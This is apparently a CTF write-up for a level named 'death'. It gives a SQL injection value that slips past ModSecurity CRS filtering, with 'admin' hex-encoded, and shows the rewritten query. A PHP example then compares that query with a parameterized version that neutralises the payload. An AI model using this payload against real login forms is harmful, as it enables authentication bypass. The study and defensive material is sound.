
death


We are provided with the SQL query:

SELECT id FROM prob_death WHERE id='{$_GET[id]}' AND pw=md5('{$_GET[pw]}')

In this challenge as well, the ModSecurity CRS is being used.

ModSecurity CRS

The ModSecurity Core Rule Set is a set of regular expressions that Web Application Firewalls can use to filter traffic. In this case, our input is being filtered based on this rule set.

To bypass this, we can refer to this GitHub issue.


However, we have to modify the payload slightly.

-1'<@=1 OR id LIKE 0x61646d696e OR '

If we provide the following URI parameter:

?id=-1'<@=1 OR id LIKE 0x61646d696e OR '

The resultant query becomes:

SELECT id FROM prob_death WHERE id='-1'<@=1 OR id LIKE 0x61646d696e OR '' AND pw=md5('')
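
The WAF only filters input on its way to a query that is still built by string interpolation, so the durable fix is in the query itself. The following is an added example, not the challenge's code: it puts the interpolated query next to the same lookup with bound parameters. It assumes an in-memory SQLite database in place of the challenge's MySQL, constructed table rows, and the hypothetical helper names build_interpolated_query and find_user.

```php
<?php
// Added example, not the challenge's code. SQLite in memory stands in for the
// challenge's MySQL database; the table rows below are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE prob_death (id TEXT, pw TEXT)');
$seed = $pdo->prepare('INSERT INTO prob_death (id, pw) VALUES (?, ?)');
$seed->execute(['admin', md5('constructed-admin-password')]);
$seed->execute(['guest', md5('guest')]);

// Vulnerable pattern from the page: request values become part of the SQL text.
function build_interpolated_query(array $get): string
{
    return "SELECT id FROM prob_death WHERE id='{$get['id']}' AND pw=md5('{$get['pw']}')";
}

// Hardened form: the SQL text is fixed and the values travel as bound parameters.
// md5() is computed in PHP only because SQLite has no md5() SQL function.
function find_user(PDO $pdo, array $get): ?string
{
    $id = $get['id'] ?? '';
    $pw = $get['pw'] ?? '';
    if (!is_string($id) || !is_string($pw)) {
        return null; // reject array-valued parameters such as ?id[]=x
    }
    $stmt = $pdo->prepare('SELECT id FROM prob_death WHERE id = :id AND pw = :pw');
    $stmt->execute([':id' => $id, ':pw' => md5($pw)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['id'];
}

// Constructed requests: the parameter value shown on the page and a normal login.
$fromPage = ['id' => "-1'<@=1 OR id LIKE 0x61646d696e OR '", 'pw' => ''];
$legit    = ['id' => 'guest', 'pw' => 'guest'];

// Interpolation: the quotes inside the value reshape the WHERE clause.
echo build_interpolated_query($fromPage), PHP_EOL;

// Bound parameters: the whole value is compared to the id column as one string,
// so it can only match a row whose id is literally that text.
var_dump(find_user($pdo, $fromPage));
var_dump(find_user($pdo, $legit));
```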
